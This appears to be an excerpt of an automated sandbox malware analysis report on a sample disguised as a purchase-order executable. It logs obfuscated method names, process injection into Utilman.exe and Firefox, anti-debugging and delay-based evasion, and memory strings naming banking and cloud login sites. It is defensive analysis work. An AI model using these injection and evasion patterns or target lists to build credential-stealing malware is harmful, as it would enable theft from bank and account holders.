Source: 0.2.PO 768733 - 6750.exe.7f80000.4.raw.unpack, kDpYFEfYGxJiucY4DV.cs	High entropy of concatenated method names: 'tYj8KSFADv', 'qAP8cR0OQ3', 'uqq8V0PSqI', 'vXm87MVidy', 'ta38r8E05K', 'MNg8RWPuaH', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO 768733 - 6750.exe.7330000.3.raw.unpack, RXv2gXFWfOHdOu5o4x.cs	High entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
Source: 0.2.PO 768733 - 6750.exe.7330000.3.raw.unpack, gaWNLGnov1rlIG3v4D.cs	High entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'
Source: 0.2.PO 768733 - 6750.exe.323c808.0.raw.unpack, RXv2gXFWfOHdOu5o4x.cs	High entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
Source: 0.2.PO 768733 - 6750.exe.323c808.0.raw.unpack, gaWNLGnov1rlIG3v4D.cs	High entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD7E4
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD944
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD504
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD544
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Windows\SysWOW64\Utilman.exe	API/Special instruction interceptor: Address: 7FF9105CDA44

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: A490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Memory allocated: B6A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\Utilman.exe	Window / User API: threadDelayed 1522			Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Window / User API: threadDelayed 8449			Jump to behavior

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\Utilman.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe TID: 6776	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe TID: 6816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 4556	Thread sleep count: 1522 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 4556	Thread sleep time: -3044000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 4556	Thread sleep count: 8449 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe TID: 4556	Thread sleep time: -16898000s >= -30000s	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO 768733 - 6750.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
PO 768733 - 6750.exe

Source: C:\Windows\SysWOW64\Utilman.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\Utilman.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zure.comVMware20,11696487552j
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 1b71Jp.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 1b71Jp.10.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11B
Source: 1b71Jp.10.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 1b71Jp.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 1b71Jp.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,116
Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696S
Source: 1b71Jp.10.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Utilman.exe, 0000000A.00000002.2496001959.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000002.2497807132.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1879822737.000001F74F59E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1b71Jp.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 1b71Jp.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 1b71Jp.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 1b71Jp.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 1b71Jp.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 1b71Jp.10.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 1b71Jp.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 1b71Jp.10.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 1b71Jp.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 1b71Jp.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169648
Source: 1b71Jp.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Utilman.exe, 0000000A.00000002.2500686686.000000000816F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: active Brokers - COM.HKVMware20,11696487552
Source: 1b71Jp.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtAllocateVirtualMemory: Direct from: 0x77172BFC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtDelayExecution: Direct from: 0x77172DDC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtProtectVirtualMemory: Direct from: 0x77167B2E	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQuerySystemInformation: Direct from: 0x77172DFC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtReadFile: Direct from: 0x77172ADC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQueryInformationProcess: Direct from: 0x77172C26	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtResumeThread: Direct from: 0x77172FBC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtWriteVirtualMemory: Direct from: 0x7717490C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtCreateUserProcess: Direct from: 0x7717371C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtOpenKeyEx: Direct from: 0x77172B9C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtNotifyChangeKey: Direct from: 0x77173C2C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtSetInformationProcess: Direct from: 0x77172C5C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtProtectVirtualMemory: Direct from: 0x77172F9C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtResumeThread: Direct from: 0x771736AC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtMapViewOfSection: Direct from: 0x77172D1C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtWriteVirtualMemory: Direct from: 0x77172E3C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtCreateMutant: Direct from: 0x771735CC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtDeviceIoControlFile: Direct from: 0x77172AEC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtAllocateVirtualMemory: Direct from: 0x77172BEC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtTerminateThread: Direct from: 0x77172FCC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQueryInformationToken: Direct from: 0x77172CAC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtCreateFile: Direct from: 0x77172FEC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtOpenFile: Direct from: 0x77172DCC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtClose: Direct from: 0x77172B6C
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtSetInformationThread: Direct from: 0x771663F9	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtAllocateVirtualMemory: Direct from: 0x77173C9C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQueryAttributesFile: Direct from: 0x77172E6C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtSetInformationThread: Direct from: 0x77172B4C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtReadVirtualMemory: Direct from: 0x77172E8C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtCreateKey: Direct from: 0x77172C6C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQueryVolumeInformationFile: Direct from: 0x77172F2C	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtAllocateVirtualMemory: Direct from: 0x771748EC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtQuerySystemInformation: Direct from: 0x771748CC	Jump to behavior
Source: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe	NtOpenSection: Direct from: 0x77172E0C	Jump to behavior

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: NULL target: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Section loaded: NULL target: C:\Windows\SysWOW64\Utilman.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files (x86)\tUxnUyYKLghSnxOGjzIasEizeWNFBOJVchxRrKtIVyxmJEkHevUiLgjQXPcuSrlyaJLYV\qMWzFch3YSFcC7wtIS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2497343504.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000000.1482660770.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000000.1646384530.0000000001151000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2497343504.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000000.1482660770.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000000.1646384530.0000000001151000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2497343504.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000000.1482660770.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000000.1646384530.0000000001151000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerW
Source: qMWzFch3YSFcC7wtIS.exe, 00000009.00000002.2497343504.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 00000009.00000000.1482660770.00000000016A1000.00000002.00000001.00040000.00000000.sdmp, qMWzFch3YSFcC7wtIS.exe, 0000000B.00000000.1646384530.0000000001151000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Users\user\Desktop\PO 768733 - 6750.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Queries volume information: C:\Windows\Fonts\GILSANUB.TTF VolumeInformation	Jump to behavior

